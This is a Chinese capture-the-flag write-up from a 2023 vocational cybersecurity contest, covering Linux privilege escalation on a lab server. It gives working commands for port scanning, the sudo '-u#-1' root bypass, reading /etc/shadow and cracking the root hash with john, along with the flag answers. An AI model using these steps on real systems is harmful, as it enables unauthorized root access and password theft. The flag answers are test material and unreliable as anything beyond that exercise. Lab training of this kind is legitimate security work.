2023年中职"网络安全"---Linux系统渗透提权①
- Linux系统渗透提权
-
- 任务环境说明:
-
- [1. 使用渗透机对服务器信息收集,并将服务器中SSH服务端口号作为flag提交;](#1. 使用渗透机对服务器信息收集,并将服务器中SSH服务端口号作为flag提交;)
- [2. 使用渗透机对服务器信息收集,并将服务器中主机名称作为flag提交;](#2. 使用渗透机对服务器信息收集,并将服务器中主机名称作为flag提交;)
- [3. 使用渗透机对服务器信息收集,并将服务器中系统内核版本作为flag提交;](#3. 使用渗透机对服务器信息收集,并将服务器中系统内核版本作为flag提交;)
- [4. 使用渗透机对服务器管理员提权,并将服务器中root目录下的文本内容作为flag提交;](#4. 使用渗透机对服务器管理员提权,并将服务器中root目录下的文本内容作为flag提交;)
- [5. 使用渗透机对服务器管理员提权,并将服务器中root的密码作为flag提交;](#5. 使用渗透机对服务器管理员提权,并将服务器中root的密码作为flag提交;)
- [6. 使用渗透机对服务器管理员提权,并将服务器中root目录下的图片内容作为flag提交。](#6. 使用渗透机对服务器管理员提权,并将服务器中root目录下的图片内容作为flag提交。)
Linux系统渗透提权
任务环境说明:
- 服务器场景:Server2204(关闭链接)
- 用户名:hacker 密码:123456
1. 使用渗透机对服务器信息收集,并将服务器中SSH服务端口号作为flag提交;
bash
nmap -p- -sV 靶机IP # -p- 扫描全部端口,-sV 版本探测
flag: 2283/tcp
2. 使用渗透机对服务器信息收集,并将服务器中主机名称作为flag提交;
bash
ssh hacker@靶机IP -p 2283 -oKexAlgorithms=+diffie-hellman-group1-sha1 # -p 选择端口,-oKexAlgorithms=+diffie-hellman-group1-sha1 加上这个算,你可以点击下面的链接
uname -a # 查看系统基本信息
flag: KipZ1eze
3. 使用渗透机对服务器信息收集,并将服务器中系统内核版本作为flag提交;
bash
uname -a # 查看系统基本信息
flag: 2.6.32-642.el6.x86_64
4. 使用渗透机对服务器管理员提权,并将服务器中root目录下的文本内容作为flag提交;
bash
sudo -u#-1 bash # sudo 版本小于1.8.28,当前用户存在于sudo权限列表
bash
cd /root # 进入root文件夹
ls -la # 查看当前文件夹下的所有文件,并且以列表方式输出
cat key.txt # 查看key.txt文本内容
flag: 7QcSI8kK
5. 使用渗透机对服务器管理员提权,并将服务器中root的密码作为flag提交;
bash
cat /etc/shadow # 查看root的shadow文件
bash
vim hash # 把root信息行写入进去
cat hash # 查看是否写入成功
john hash # 破解密码
flag: Woodrow
6. 使用渗透机对服务器管理员提权,并将服务器中root目录下的图片内容作为flag提交。
bash
pwd # 查看当前目录
ls -la # 查看当前文件夹下的所有文件,并且以列表方式输出
python -m SimpleHTTPServer 8080 # 在8080端口开启一个HTTP服务
text
访问的时候一定要指定8080端口
flag: uB81UvW0